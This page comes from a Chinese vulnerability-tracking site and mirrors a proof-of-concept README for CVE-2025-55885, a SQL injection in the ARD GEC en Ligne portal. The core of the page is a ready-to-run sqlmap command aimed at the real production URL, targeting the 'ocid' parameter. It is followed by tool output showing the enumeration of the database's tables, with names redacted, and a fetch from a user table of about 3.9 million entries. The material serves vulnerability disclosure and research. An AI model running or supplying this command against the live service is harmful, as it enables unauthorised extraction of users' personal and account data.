漏洞平台

POC详情： 4d1e3c56b2e3c2b4b5b8db4c119dd876015cd03c

来源

https://github.com/0xZeroSec/CVE-2025-55885

关联漏洞

标题： ARD GEC en Lign 安全漏洞 (CVE-2025-55885)
描述：ARD GEC en Ligne是法国ARD公司的一个线上服务门户网站。 ARD GEC en Lign 2025-04-23之前版本存在安全漏洞，该漏洞源于index.php中GET参数处理不当，可能导致SQL注入攻击和权限提升。

介绍

# CVE-2025-55885
### Description
SQL Injection vulnerability in Alpes Recherche et Developpement ARD GEC
en Ligne before v.2025-04-23 allows a remote attacker to escalate
privileges via the GET parameters in index.php

### Attack Vectors
SQL injection via unsanitized GET parameter ocid on https://services.ard.fr/index.php (transaction confirmation page).

### Proof Of Concept
**Payload**
```
sqlmap -u "https://services.ard.fr/index.php?id=5869&ocid=183&token=1SemPugSUq3maSpK81871559797854161&transactionID=123" -p "ocid" --dbms=mysql -D ard-T [TABLE] --dump
````

**List of Tables**
```
[18:36:46] [INFO] retrieved: [redacted]
[18:37:15] [INFO] retrieved: [redacted]
[18:37:27] [INFO] retrieved: [redacted]
[18:37:39] [INFO] retrieved: [redacted]
[18:37:58] [INFO] retrieved: [redacted]
[18:38:15] [INFO] retrieved: [redacted]
[18:38:27] [INFO] retrieved: [redacted]
[18:38:59] [INFO] retrieved: [redacted]
[18:39:09] [INFO] retrieved: [redacted]
[18:39:30] [INFO] retrieved: [redacted]
[18:39:51] [INFO] retrieved: [redacted]
[18:40:03] [INFO] retrieved: [redacted]
[18:40:18] [INFO] retrieved: [redacted]
[18:40:35] [INFO] retrieved: [redacted]
[18:41:02] [INFO] retrieved: [redacted]
[18:41:48] [INFO] retrieved: [redacted]
[18:42:06] [INFO] retrieved: [redacted]
[18:42:23] [INFO] retrieved: [redacted]
[18:42:44] [INFO] retrieved: [redacted]
[18:43:04] [INFO] retrieved: [redacted]
[18:43:25] [INFO] retrieved: [redacted]
[18:44:01] [INFO] retrieved: [redacted]
[18:44:20] [INFO] retrieved: [redacted]
[18:44:40] [INFO] retrieved: [redacted]
[18:45:01] [INFO] retrieved: [redacted]
[18:45:13] [INFO] retrieved: [redacted]
[18:45:36] [INFO] retrieved: [redacted]
[18:45:54] [INFO] retrieved: [redacted]
[18:46:31] [INFO] retrieved: [redacted]
[18:46:56] [INFO] retrieved: [redacted]
[18:47:02] [INFO] retrieved: [redacted]
[18:47:13] [INFO] retrieved: [redacted]
[18:47:34] [INFO] retrieved: [redacted]
[18:47:58] [INFO] retrieved: [redacted]
[18:48:21] [INFO] retrieved: [redacted]
[19:45:51] [INFO] fetching entries for table '[user table]' in database 'ard'
[19:45:51] [INFO] fetching number of entries for table '[user table]' in database 'ard'
[19:45:51] [INFO] retrieved: 3904699
```

### Reseachers
- [raphckrman](https://github.com/raphckrman)

文件快照


 [4.0K]  /data/pocs/4d1e3c56b2e3c2b4b5b8db4c119dd876015cd03c
└── [2.2K]  README.md

0 directories, 1 file

神龙机器人已为您缓存

备注

1. 建议优先通过来源进行访问。

2. 如果因为来源失效或无法访问，请发送邮箱到 f.jinxu#gmail.com 索取本地快照（把 # 换成 @）。

3. 神龙已为您对POC代码进行快照，为了长期维护，请考虑为本地POC付费，感谢您的支持。